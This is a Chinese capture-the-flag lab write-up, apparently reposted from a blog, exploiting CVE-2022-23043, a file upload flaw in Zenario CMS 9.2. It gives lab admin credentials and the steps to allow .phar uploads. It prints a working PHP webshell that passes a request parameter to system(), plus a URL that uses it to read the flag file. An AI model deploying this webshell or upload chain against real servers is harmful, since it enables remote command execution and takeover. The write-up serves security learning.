0


[春秋云镜]CVE-2022-23043

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!

靶场介绍

Zenario CMS 9.2 文件上传漏洞,攻击者可上传webshell执行任意命令。登陆信息:admin/adminqwe12

春秋云镜开启靶场:

http://47.95.3.91:13095/

开启靶场后需要先配置一下文档存放位置 (否则无法getshell)

http://47.95.3.91:13095/admin

admin/adminqwe12 登录后台

文档存放位置

都修改为/tmp

** 修改好之后点击继续**

/organizer.php#zenario__organizer/panels/start_page

访问http://47.95.3.91:13095/organizer.php#zenario__organizer/panels/start_page

Configuration--File/MIME Types

创建文件类型

格式为phar 类型为 text/plain 保存

** 上传文档**

** 上传一个phar的木马文件**

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>

上传文档 选择public

Actions---View public link

http://47.95.3.91:13095/public/downloads/E90cZ/123.phar?s=cat%20../../../../../../../flag

** 成功获取flag**

标签: 安全 web安全

本文转载自: https://blog.csdn.net/niubi707/article/details/128172885
版权归原作者 web-春天11 所有, 如有侵权,请联系我们删除。

“[春秋云镜]CVE-2022-23043”的评论:

还没有评论